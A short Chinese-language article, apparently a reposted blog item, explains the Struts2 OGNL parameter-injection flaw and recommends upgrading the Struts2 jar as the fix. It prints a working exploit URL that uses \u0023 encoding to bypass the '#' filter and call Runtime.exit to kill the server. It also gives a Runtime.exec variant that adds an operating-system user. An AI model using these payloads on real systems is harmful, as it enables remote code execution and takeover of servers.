struts2漏洞原理及解决的方法

1、原理

Struts2的核心是使用的webwork框架，处理 action时通过调用底层的getter/setter方法来处理http的參数，它将每一个http參数声明为一个ONGL（这里是ONGL的介绍）语句。

当我们提交一个http參数：

?user.address.city=Bishkek&user['favoriteDrink']=kumys 
ONGL将它转换为：
action.getUser().getAddress().setCity("Bishkek")  
action.getUser().setFavoriteDrink("kumys") 

这是通过ParametersInterceptor（參数过滤器）来运行的。使用用户提供的HTTP參数调用 ValueStack.setValue()。

 www.2cto.com

为了防范篡改server端对象，XWork的ParametersInterceptor不同意參数名中出现“#”字符。但假设使用了Java的 unicode字符串表示\u0023，攻击者就能够绕过保护，改动保护Java方式运行的值：

 

此处代码有破坏性，请在測试环境运行，严禁用此种方法进行恶意攻击
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1 

 

转义后是这样：

?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1

 

OGNL处理时终于的结果就是

java.lang.Runtime.getRuntime().exit(1);  //关闭程序，即将web程序关闭

类似的能够运行
java.lang.Runtime.getRuntime().exec("net user username password /add");//添加操作系统用户，在有权限的情况下能成功（在URL中用%20替换空格，%2F替换/）
仅仅要有权限就能够运行不论什么DOS命令。

2、解决方法
网上非常多文章都介绍了三种解决方法，个人认为将struts2的jar包更新到最新版本号最简单。不用更改不论什么程序代码